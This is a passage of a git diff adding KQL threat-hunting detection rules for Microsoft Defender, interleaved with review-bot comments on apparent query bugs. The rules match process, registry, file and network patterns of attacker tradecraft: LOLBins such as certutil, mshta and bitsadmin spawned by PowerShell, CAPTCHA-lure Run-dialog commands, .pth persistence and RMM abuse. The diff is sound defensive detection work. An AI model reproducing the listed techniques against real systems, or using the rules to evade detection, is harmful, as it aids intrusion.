\ No newline at end of file
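Review bot: `FolderPath endswith "\\AppData\\Local\\Apps\\2.0\\"` in the ClickOnce rule ends in a path separator, but `FolderPath` in `DeviceProcessEvents` is the full image path and ends with the executable name (the sibling rules rely on exactly that with `FolderPath endswith "\\cmd.exe"` and the like), so this clause can never be true and the rule returns nothing. The directory check is presumably meant as a substring test: `FolderPath contains "\\AppData\\Local\\Apps\\2.0\\"`. It would be worth checking whether the converter maps a Sigma `contains` on the image field to `endswith` in other generated rules as well.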
diff --git a/KQL/rules-threat-hunting/Execution/command_executed_via_run_dialog_box_registry.kql b/KQL/rules-threat-hunting/Execution/command_executed_via_run_dialog_box_registry.kql
new file mode 100644
index 00000000..1c82dc75
--- /dev/null
+++ b/KQL/rules-threat-hunting/Execution/command_executed_via_run_dialog_box_registry.kql
@@ -0,0 +1,14 @@
+// Title: Command Executed Via Run Dialog Box - Registry
+// Author: Ahmed Farouk, Nasreddine Bencherchali
+// Date: 2024-11-01
+// Level: low
+// Description: Detects execution of commands via the run dialog box on Windows by checking values of the "RunMRU" registry key.
+This technique was seen being abused by threat actors to deceive users into pasting and executing malicious commands, often disguised as CAPTCHA verification steps.
+
+// MITRE Tactic: Execution
+// Tags: detection.threat-hunting, attack.execution
+// False Positives:
+// - Likely
+
+DeviceRegistryEvents
+| where RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU" and (not(RegistryKey endswith "\\MRUList")) and (not(((RegistryValueData in~ ("%appdata%\\1", "%localappdata%\\1", "%public%\\1", "%temp%\\1", "calc\\1", "dxdiag\\1", "explorer\\1", "gpedit.msc\\1", "mmc\\1", "notepad\\1", "regedit\\1", "services.msc\\1", "winver\\1")) or RegistryValueData contains "ping")))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Execution/dfsvc_exe_network_connection_to_non_local_ips.kql b/KQL/rules-threat-hunting/Execution/dfsvc_exe_network_connection_to_non_local_ips.kql
new file mode 100644
index 00000000..844268d6
--- /dev/null
+++ b/KQL/rules-threat-hunting/Execution/dfsvc_exe_network_connection_to_non_local_ips.kql
@@ -0,0 +1,12 @@
+// Title: Dfsvc.EXE Network Connection To Non-Local IPs
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-06-12
+// Level: medium
+// Description: Detects network connections from "dfsvc.exe" used to handled ClickOnce applications to non-local IPs
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1203, detection.threat-hunting
+// False Positives:
+// - False positives are expected from ClickOnce manifests hosted on public IPs and domains. Apply additional filters for the accepted IPs in your environement as necessary
+
+DeviceNetworkEvents
+| where InitiatingProcessFolderPath endswith "\\dfsvc.exe" and (not((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7"))))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Execution/import_new_module_via_powershell_commandline.kql b/KQL/rules-threat-hunting/Execution/import_new_module_via_powershell_commandline.kql
new file mode 100644
index 00000000..0d407fd5
--- /dev/null
+++ b/KQL/rules-threat-hunting/Execution/import_new_module_via_powershell_commandline.kql
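Review bot: `ipv4_is_in_range(RemoteIP, "::1/128")`, `"fe80::/10"` and `"fc00::/7"` hand IPv6 prefixes to an IPv4-only function, which yields null when either argument fails to parse; as I read Kusto's null semantics, `false or null` stays null, `not(null)` is null, and `where` drops a null predicate, so the whole exclusion evaluates to null for every row and this rule likely returns nothing at all (at minimum every IPv6 `RemoteIP` is lost). The IPv6 prefixes should go through `ipv6_is_in_range`, and the IPv4 checks should be made null-safe, e.g. `coalesce(ipv4_is_in_range(RemoteIP, "127.0.0.0/8"), false)`, so that one unparsable comparison cannot veto the row. Network Connection Initiated By PowerShell Process in this chunk builds the same local-range exclusion list and has the same gap.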
@@ -0,0 +1,12 @@
+// Title: Import New Module Via PowerShell CommandLine
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-09
+// Level: low
+// Description: Detects usage of the "Import-Module" cmdlet in order to add new Cmdlets to the current PowerShell session
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.threat-hunting
+// False Positives:
+// - Depending on the environement, many legitimate scripts will import modules inline. This rule is targeted for hunting purposes.
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "Import-Module " or ProcessCommandLine contains "ipmo ") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))) and (not(((ProcessCommandLine contains ":\\Program Files\\Microsoft Visual Studio\\" and ProcessCommandLine contains "Tools\\Microsoft.VisualStudio.DevShell.dll") and (InitiatingProcessFolderPath contains ":\\Program Files\\WindowsApps\\Microsoft.WindowsTerminal_" or InitiatingProcessFolderPath contains ":\\Windows\\System32\\cmd.exe"))))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Execution/manual_execution_of_script_inside_of_a_compressed_file.kql b/KQL/rules-threat-hunting/Execution/manual_execution_of_script_inside_of_a_compressed_file.kql
new file mode 100644
index 00000000..cf46b317
--- /dev/null
+++ b/KQL/rules-threat-hunting/Execution/manual_execution_of_script_inside_of_a_compressed_file.kql
@@ -0,0 +1,20 @@
+// Title: Manual Execution of Script Inside of a Compressed File
+// Author: @kostastsale
+// Date: 2023-02-15
+// Level: medium
+// Description: This is a threat-hunting query to collect information related to the interactive execution of a script from inside a compressed file (zip/rar). Windows will automatically run the script using scripting interpreters such as wscript and cscript binaries.
+
+From the query below, the child process is the script interpreter that will execute the script. The script extension is also a set of standard extensions that Windows OS recognizes. Selections 1-3 contain three different execution scenarios.
+ 1. Compressed file opened using 7zip.
+ 2. Compressed file opened using WinRar.
+ 3. Compressed file opened using native windows File Explorer capabilities.
+
+When the malicious script is double-clicked, it will be extracted to the respected directories as signified by the CommandLine on each of the three Selections. It will then be executed using the relevant script interpreter."
+
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059, detection.threat-hunting
+// False Positives:
+// - Batch files may produce a lot of noise, as many applications appear to bundle them as part of their installation process. You should baseline your environment and generate a new query excluding the noisy and expected activity. Some false positives may come up depending on your environment. All results should be investigated thoroughly before filtering out results.
+
+DeviceProcessEvents
+| where ((ProcessCommandLine =~ "*\\AppData\\local\\temp\\7z*\*" and InitiatingProcessFolderPath =~ "*\\7z*.exe") or ((ProcessCommandLine contains "\\AppData\\local\\temp*.rar\\" or ProcessCommandLine contains "\\AppData\\local\\temp*.zip\\") and InitiatingProcessFolderPath endswith "\\explorer.exe") or (ProcessCommandLine =~ "*\\AppData\\local\\temp\\rar*\*" and InitiatingProcessFolderPath endswith "\\winrar.exe")) and ((ProcessCommandLine endswith ".hta" or ProcessCommandLine endswith ".js" or ProcessCommandLine endswith ".jse" or ProcessCommandLine endswith ".ps1" or ProcessCommandLine endswith ".vbe" or ProcessCommandLine endswith ".vbs" or ProcessCommandLine endswith ".wsf" or ProcessCommandLine endswith ".wsh") and (FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wscript.exe"))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Execution/microsoft_excel_add_in_loaded.kql b/KQL/rules-threat-hunting/Execution/microsoft_excel_add_in_loaded.kql
new file mode 100644
index 00000000..d1b0df35
--- /dev/null
+++ b/KQL/rules-threat-hunting/Execution/microsoft_excel_add_in_loaded.kql
@@ -0,0 +1,12 @@
+// Title: Microsoft Excel Add-In Loaded
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-12
+// Level: low
+// Description: Detects Microsoft Excel loading an Add-In (.xll) file
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1204.002, detection.threat-hunting
+// False Positives:
+// - The rules is only looking for ".xll" loads. So some false positives are expected with legitimate and allowed XLLs
+
+DeviceImageLoadEvents
+| where FolderPath endswith ".xll" and InitiatingProcessFolderPath endswith "\\excel.exe"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Execution/microsoft_word_add_in_loaded.kql b/KQL/rules-threat-hunting/Execution/microsoft_word_add_in_loaded.kql
new file mode 100644
index 00000000..71f64ba2
--- /dev/null
+++ b/KQL/rules-threat-hunting/Execution/microsoft_word_add_in_loaded.kql
@@ -0,0 +1,13 @@
+// Title: Microsoft Word Add-In Loaded
+// Author: Steffen Rogge (dr0pd34d)
+// Date: 2024-07-10
+// Level: low
+// Description: Detects Microsoft Word loading an Add-In (.wll) file which can be used by threat actors for initial access or persistence.
+
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1204.002, detection.threat-hunting
+// False Positives:
+// - The rules is only looking for ".wll" loads. So some false positives are expected with legitimate and allowed WLLs.
+
+DeviceImageLoadEvents
+| where FolderPath endswith ".wll" and InitiatingProcessFolderPath endswith "\\winword.exe"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Execution/network_connection_initiated_by_powershell_process.kql b/KQL/rules-threat-hunting/Execution/network_connection_initiated_by_powershell_process.kql
new file mode 100644
index 00000000..4ce07150
--- /dev/null
+++ b/KQL/rules-threat-hunting/Execution/network_connection_initiated_by_powershell_process.kql
@@ -0,0 +1,17 @@
+// Title: Network Connection Initiated By PowerShell Process
+// Author: Florian Roth (Nextron Systems)
+// Date: 2017-03-13
+// Level: low
+// Description: Detects a network connection that was initiated from a PowerShell process.
+Often times malicious powershell scripts download additional payloads or communicate back to command and control channels via uncommon ports or IPs.
+Use this rule as a basis for hunting for anomalies.
+
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001, detection.threat-hunting
+// False Positives:
+// - Administrative scripts
+// - Microsoft IP range
+// - Additional filters are required. Adjust to your environment (e.g. extend filters with company's ip range')
+
+DeviceNetworkEvents
+| where (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") and (not((((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")) and (InitiatingProcessAccountName contains "AUTHORI" or InitiatingProcessAccountName contains "AUTORI")) or (ipv4_is_in_range(RemoteIP, "20.184.0.0/13") or ipv4_is_in_range(RemoteIP, "51.103.210.0/23")))))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Execution/potential_boinc_software_execution_uc_berkeley_signature_.kql b/KQL/rules-threat-hunting/Execution/potential_boinc_software_execution_uc_berkeley_signature_.kql
new file mode 100644
index 00000000..daf9a923
--- /dev/null
+++ b/KQL/rules-threat-hunting/Execution/potential_boinc_software_execution_uc_berkeley_signature_.kql
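Review bot: The local-range exclusion is gated on `InitiatingProcessAccountName contains "AUTHORI" or InitiatingProcessAccountName contains "AUTORI"`, which presumably mirrors a Sigma `User` match on the `NT AUTHORITY\` prefix; in the Defender schema, as far as I know, that prefix lives in `InitiatingProcessAccountDomain` while `InitiatingProcessAccountName` holds only the bare account name, so this condition never holds and connections by SYSTEM-owned PowerShell to private ranges are not filtered out as intended. Testing the domain column instead, `InitiatingProcessAccountDomain contains "AUTHORI" or InitiatingProcessAccountDomain contains "AUTORI"`, keeps the filter's intent. Please verify against a sample of `DeviceNetworkEvents` rows before changing it.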
@@ -0,0 +1,14 @@
+// Title: Potential BOINC Software Execution (UC-Berkeley Signature)
+// Author: Matt Anderson (Huntress)
+// Date: 2024-07-23
+// Level: informational
+// Description: Detects the use of software that is related to the University of California, Berkeley via metadata information.
+This indicates it may be related to BOINC software and can be used maliciously if unauthorized.
+
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1553, detection.threat-hunting
+// False Positives:
+// - This software can be used for legitimate purposes when installed intentionally.
+
+DeviceProcessEvents
+| where ProcessVersionInfoFileDescription =~ "University of California, Berkeley"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Execution/potential_file_override_append_via_set_command.kql b/KQL/rules-threat-hunting/Execution/potential_file_override_append_via_set_command.kql
new file mode 100644
index 00000000..c99aef84
--- /dev/null
+++ b/KQL/rules-threat-hunting/Execution/potential_file_override_append_via_set_command.kql
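Review bot: The match on the last line keys on `ProcessVersionInfoFileDescription`, but the value `"University of California, Berkeley"` is an organisation name, which in DeviceProcessEvents is carried by `ProcessVersionInfoCompanyName`; the file-description field normally holds the product text, so this condition may never match on real BOINC binaries. If the intent, as the description's "via metadata information" suggests, is the company/signer metadata, change it to `| where ProcessVersionInfoCompanyName =~ "University of California, Berkeley"`. Worth confirming against the version metadata of a known BOINC client before merging.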
@@ -0,0 +1,16 @@
+// Title: Potential File Override/Append Via SET Command
+// Author: Nasreddine Bencherchali (Nextron Systems), MahirAli Khan (in/mahiralikhan)
+// Date: 2024-08-22
+// Level: low
+// Description: Detects the use of the "SET" internal command of Cmd.EXE with the /p flag followed directly by an "=" sign.
+Attackers used this technique along with an append redirection operator ">>" in order to update the content of a file indirectly.
+Ex: cmd /c >> example.txt set /p="test data". This will append "test data" to contents of "example.txt".
+The typical use case of the "set /p=" command is to prompt the user for input.
+
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, detection.threat-hunting
+// False Positives:
+// - Legitimate use of the SET with the "/p" flag for user prompting. command in administrative scripts or user-generated scripts.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/c set /p=" or ProcessCommandLine contains "\"set /p=" or (ProcessCommandLine contains ">>" and ProcessCommandLine contains "set /p=")) and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe")
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Execution/potentially_suspicious_powershell_child_processes.kql b/KQL/rules-threat-hunting/Execution/potentially_suspicious_powershell_child_processes.kql
new file mode 100644
index 00000000..18ae2197
--- /dev/null
+++ b/KQL/rules-threat-hunting/Execution/potentially_suspicious_powershell_child_processes.kql
@@ -0,0 +1,14 @@
+// Title: Potentially Suspicious PowerShell Child Processes
+// Author: Florian Roth (Nextron Systems), Tim Shelton
+// Date: 2022-04-26
+// Level: medium
+// Description: Detects potentially suspicious child processes spawned by PowerShell.
+Use this rule to hunt for potential anomalies initiating from PowerShell scripts and commands.
+
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001, detection.threat-hunting
+// False Positives:
+// - False positives are to be expected from PowerShell scripts that might make use of additional binaries such as "mshta", "bitsadmin", etc. Apply additional filters for those scripts.
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\bash.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\scrcons.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe") and (InitiatingProcessFolderPath endswith "\\powershell_ise.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe")) and (not(((ProcessCommandLine contains "-verifystore " and FolderPath endswith "\\certutil.exe") or ((ProcessCommandLine contains "qfe list" or ProcessCommandLine contains "diskdrive " or ProcessCommandLine contains "csproduct " or ProcessCommandLine contains "computersystem " or ProcessCommandLine contains " os " or ProcessCommandLine startswith "") and FolderPath endswith "\\wmic.exe")))) and (not((ProcessCommandLine contains "\\Program Files\\Amazon\\WorkspacesConfig\\Scripts\\" and InitiatingProcessCommandLine contains "\\Program 
Files\\Amazon\\WorkspacesConfig\\Scripts\\")))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Execution/process_execution_from_webdav_share.kql b/KQL/rules-threat-hunting/Execution/process_execution_from_webdav_share.kql
new file mode 100644
index 00000000..5a76cf68
--- /dev/null
+++ b/KQL/rules-threat-hunting/Execution/process_execution_from_webdav_share.kql
@@ -0,0 +1,16 @@
+// Title: Process Execution From WebDAV Share
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-06-13
+// Level: low
+// Description: Detects execution of processes with image paths starting with WebDAV shares (\\), which might indicate malicious file execution from remote web shares.
+Execution of processes from WebDAV shares can be a sign of lateral movement or exploitation attempts, especially if the process is not a known legitimate application.
+Exploitation Attempt of vulnerabilities like CVE-2025-33053 also involves executing processes from WebDAV paths.
+
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.command-and-control, attack.lateral-movement, attack.t1105, detection.threat-hunting
+// False Positives:
+// - Legitimate use of WebDAV shares for process execution
+// - Known applications executing from WebDAV paths
+
+DeviceProcessEvents
+| where FolderPath contains "\\DavWWWRoot\\" and FolderPath startswith "\\\\"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Execution/python_path_configuration_file_creation_linux.kql b/KQL/rules-threat-hunting/Execution/python_path_configuration_file_creation_linux.kql
new file mode 100644
index 00000000..dbe576c6
--- /dev/null
+++ b/KQL/rules-threat-hunting/Execution/python_path_configuration_file_creation_linux.kql
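Review bot: In the wmic.exe exclusion of the `where` clause of "Potentially Suspicious PowerShell Child Processes" (the hunk starts on the previous physical line), `ProcessCommandLine startswith ""` matches every non-null command line, so the whole `(...) and FolderPath endswith "\\wmic.exe"` branch excludes every wmic.exe child of PowerShell and the `\\wmic.exe` entry in the detection list is dead. This looks like a conversion artefact of a filter meant for an empty or missing command line; replace the term with `isempty(ProcessCommandLine)` (or drop it) so that only the listed benign wmic queries are excluded.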
@@ -0,0 +1,15 @@
+// Title: Python Path Configuration File Creation - Linux
+// Author: Andreas Braathen (mnemonic.io)
+// Date: 2024-04-25
+// Level: medium
+// Description: Detects creation of a Python path configuration file (.pth) in Python library folders, which can be maliciously abused for code execution and persistence.
+Modules referenced by these files are run at every Python startup (v3.5+), regardless of whether the module is imported by the calling script.
+Default paths are '\lib\site-packages\*.pth' (Windows) and '/lib/pythonX.Y/site-packages/*.pth' (Unix and macOS).
+
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.006, detection.threat-hunting
+// False Positives:
+// - Although .pth files are discouraged due to potential security implications, these are legitimate files by specification.
+
+DeviceFileEvents
+| where FolderPath endswith ".pth" and FolderPath matches regex "(?i)/lib/python3\\.([5-9]|[0-9]{2})/site-packages/"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Execution/python_path_configuration_file_creation_macos.kql b/KQL/rules-threat-hunting/Execution/python_path_configuration_file_creation_macos.kql
new file mode 100644
index 00000000..041a8a59
--- /dev/null
+++ b/KQL/rules-threat-hunting/Execution/python_path_configuration_file_creation_macos.kql
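Review bot: The query on the last line reads `DeviceFileEvents` without constraining `ActionType`, so although the rule is titled "Creation", modification, rename and deletion events for the same paths are reported as well. Adding `| where ActionType == "FileCreated"` (or `ActionType in ("FileCreated", "FileRenamed")` if a rename into site-packages should also count) keeps the result to what the title and description claim. The same applies to the macOS and Windows variants of this rule, to "Scheduled Task Created - FileCreation" and to "WebDAV Temporary Local File Creation" later in this patch.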
@@ -0,0 +1,15 @@
+// Title: Python Path Configuration File Creation - MacOS
+// Author: Andreas Braathen (mnemonic.io)
+// Date: 2024-04-25
+// Level: medium
+// Description: Detects creation of a Python path configuration file (.pth) in Python library folders, which can be maliciously abused for code execution and persistence.
+Modules referenced by these files are run at every Python startup (v3.5+), regardless of whether the module is imported by the calling script.
+Default paths are '\lib\site-packages\*.pth' (Windows) and '/lib/pythonX.Y/site-packages/*.pth' (Unix and macOS).
+
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.006, detection.threat-hunting
+// False Positives:
+// - Although .pth files are discouraged due to potential security implications, these are legitimate files by specification.
+
+DeviceFileEvents
+| where FolderPath endswith ".pth" and FolderPath matches regex "(?i)/lib/python3\\.([5-9]|[0-9]{2})/site-packages/"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Execution/python_path_configuration_file_creation_windows.kql b/KQL/rules-threat-hunting/Execution/python_path_configuration_file_creation_windows.kql
new file mode 100644
index 00000000..911fbaca
--- /dev/null
+++ b/KQL/rules-threat-hunting/Execution/python_path_configuration_file_creation_windows.kql
@@ -0,0 +1,15 @@
+// Title: Python Path Configuration File Creation - Windows
+// Author: Andreas Braathen (mnemonic.io), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-04-25
+// Level: medium
+// Description: Detects creation of a Python path configuration file (.pth) in Python library folders, which can be maliciously abused for code execution and persistence.
+Modules referenced by these files are run at every Python startup (v3.5+), regardless of whether the module is imported by the calling script.
+Default paths are '\lib\site-packages\*.pth' (Windows) and '/lib/pythonX.Y/site-packages/*.pth' (Unix and macOS).
+
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.006, detection.threat-hunting
+// False Positives:
+// - Although .pth files are discouraged due to potential security implications, these are legitimate files by specification.
+
+DeviceFileEvents
+| where (FolderPath endswith ".pth" and FolderPath matches regex "(?i)\\\\(venv|python(.+)?)\\\\lib\\\\site-packages\\\\") and (not((InitiatingProcessFolderPath endswith "\\python.exe" and (FolderPath endswith "\\pywin32.pth" or FolderPath endswith "\\distutils-precedence.pth"))))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Execution/remote_access_tool_ammy_admin_agent_execution.kql b/KQL/rules-threat-hunting/Execution/remote_access_tool_ammy_admin_agent_execution.kql
new file mode 100644
index 00000000..3fd52a07
--- /dev/null
+++ b/KQL/rules-threat-hunting/Execution/remote_access_tool_ammy_admin_agent_execution.kql
@@ -0,0 +1,12 @@
+// Title: Remote Access Tool - Ammy Admin Agent Execution
+// Author: @kostastsale
+// Date: 2024-08-05
+// Level: medium
+// Description: Detects the execution of the Ammy Admin RMM agent for remote management.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.persistence, detection.threat-hunting
+// False Positives:
+// - Legitimate use of Ammy Admin RMM agent for remote management by admins.
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "AMMYY\\aa_nts.dll\",run" and FolderPath endswith "\\rundll32.exe"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Execution/remote_access_tool_cmd_exe_execution_via_anyviewer.kql b/KQL/rules-threat-hunting/Execution/remote_access_tool_cmd_exe_execution_via_anyviewer.kql
new file mode 100644
index 00000000..cf92648b
--- /dev/null
+++ b/KQL/rules-threat-hunting/Execution/remote_access_tool_cmd_exe_execution_via_anyviewer.kql
@@ -0,0 +1,13 @@
+// Title: Remote Access Tool - Cmd.EXE Execution via AnyViewer
+// Author: @kostastsale
+// Date: 2024-08-03
+// Level: medium
+// Description: Detects execution of "cmd.exe" via the AnyViewer RMM agent on a remote management sessions.
+
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.persistence, detection.threat-hunting
+// False Positives:
+// - Legitimate use for admin activity.
+
+DeviceProcessEvents
+| where FolderPath endswith "\\cmd.exe" and InitiatingProcessCommandLine contains "AVCore.exe\" -d" and InitiatingProcessFolderPath endswith "\\AVCore.exe"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Execution/remote_access_tool_screenconnect_remote_command_execution_hunting.kql b/KQL/rules-threat-hunting/Execution/remote_access_tool_screenconnect_remote_command_execution_hunting.kql
new file mode 100644
index 00000000..d6bf6ad6
--- /dev/null
+++ b/KQL/rules-threat-hunting/Execution/remote_access_tool_screenconnect_remote_command_execution_hunting.kql
@@ -0,0 +1,14 @@
+// Title: Remote Access Tool - ScreenConnect Remote Command Execution - Hunting
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-02-23
+// Level: medium
+// Description: Detects remote binary or command execution via the ScreenConnect Service.
+Use this rule in order to hunt for potentially anomalous executions originating from ScreenConnect
+
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.threat-hunting
+// False Positives:
+// - Legitimate commands launched from ScreenConnect will also trigger this rule. Look for anomalies.
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\ScreenConnect.ClientService.exe"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Execution/scheduled_task_created_filecreation.kql b/KQL/rules-threat-hunting/Execution/scheduled_task_created_filecreation.kql
new file mode 100644
index 00000000..739ff4e0
--- /dev/null
+++ b/KQL/rules-threat-hunting/Execution/scheduled_task_created_filecreation.kql
@@ -0,0 +1,12 @@
+// Title: Scheduled Task Created - FileCreation
+// Author: Center for Threat Informed Defense (CTID) Summiting the Pyramid Team
+// Date: 2023-09-27
+// Level: low
+// Description: Detects the creation of a scheduled task via file creation.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.persistence, attack.privilege-escalation, attack.t1053.005, attack.s0111, car.2013-08-001, detection.threat-hunting
+// False Positives:
+// - Normal behaviour on Windows
+
+DeviceFileEvents
+| where FolderPath contains ":\\Windows\\System32\\Tasks\\" or FolderPath contains ":\\Windows\\SysWOW64\\Tasks\\" or FolderPath contains ":\\Windows\\Tasks\\"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Execution/scheduled_task_created_registry.kql b/KQL/rules-threat-hunting/Execution/scheduled_task_created_registry.kql
new file mode 100644
index 00000000..8c575ce3
--- /dev/null
+++ b/KQL/rules-threat-hunting/Execution/scheduled_task_created_registry.kql
@@ -0,0 +1,12 @@
+// Title: Scheduled Task Created - Registry
+// Author: Center for Threat Informed Defense (CTID) Summiting the Pyramid Team
+// Date: 2023-09-27
+// Level: low
+// Description: Detects the creation of a scheduled task via Registry keys.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.persistence, attack.privilege-escalation, attack.s0111, attack.t1053.005, car.2013-08-001, detection.threat-hunting
+// False Positives:
+// - Likely as this is a normal behaviour on Windows
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks*" or RegistryKey endswith "\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree*"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Execution/scheduled_task_creation_from_potential_suspicious_parent_location.kql b/KQL/rules-threat-hunting/Execution/scheduled_task_creation_from_potential_suspicious_parent_location.kql
new file mode 100644
index 00000000..c267b4c7
--- /dev/null
+++ b/KQL/rules-threat-hunting/Execution/scheduled_task_creation_from_potential_suspicious_parent_location.kql
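Review bot: The trailing `*` in both `endswith` strings on the last line is a literal character in KQL, not a wildcard, so `RegistryKey endswith "...\\TaskCache\\Tasks*"` can never match a real key and the rule returns nothing. The Sigma-style wildcard should become a substring test, e.g. `RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\" or RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\"`. The same conversion artefact affects "Shell Context Menu Command Tampering" further down, where three `endswith` terms with literal `*` are joined with `and` and cannot all be true at once.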
@@ -0,0 +1,14 @@
+// Title: Scheduled Task Creation From Potential Suspicious Parent Location
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-02-23
+// Level: medium
+// Description: Detects the execution of "schtasks.exe" from a parent that is located in a potentially suspicious location.
+Multiple malware strains were seen exhibiting a similar behavior in order to achieve persistence.
+
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.persistence, attack.privilege-escalation, attack.t1053.005, detection.threat-hunting
+// False Positives:
+// - Software installers that run from temporary folders and also install scheduled tasks
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/Create " and FolderPath endswith "\\schtasks.exe" and (InitiatingProcessFolderPath contains ":\\Temp\\" or InitiatingProcessFolderPath contains "\\AppData\\Local\\" or InitiatingProcessFolderPath contains "\\AppData\\Roaming\\" or InitiatingProcessFolderPath contains "\\Temporary Internet" or InitiatingProcessFolderPath contains "\\Users\\Public\\" or InitiatingProcessFolderPath contains "\\Windows\\Temp\\")) and (not((ProcessCommandLine contains "update_task.xml" or ProcessCommandLine contains "unattended.ini")))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Execution/suspicious_new_instance_of_an_office_com_object.kql b/KQL/rules-threat-hunting/Execution/suspicious_new_instance_of_an_office_com_object.kql
new file mode 100644
index 00000000..ef3542a6
--- /dev/null
+++ b/KQL/rules-threat-hunting/Execution/suspicious_new_instance_of_an_office_com_object.kql
@@ -0,0 +1,14 @@
+// Title: Suspicious New Instance Of An Office COM Object
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-10-13
+// Level: medium
+// Description: Detects an svchost process spawning an instance of an office application. This happens when the initial word application creates an instance of one of the Office COM objects such as 'Word.Application', 'Excel.Application', etc.
+This can be used by malicious actors to create malicious Office documents with macros on the fly. (See vba2clr project in the references)
+
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, detection.threat-hunting
+// False Positives:
+// - Legitimate usage of office automation via scripting
+
+DeviceProcessEvents
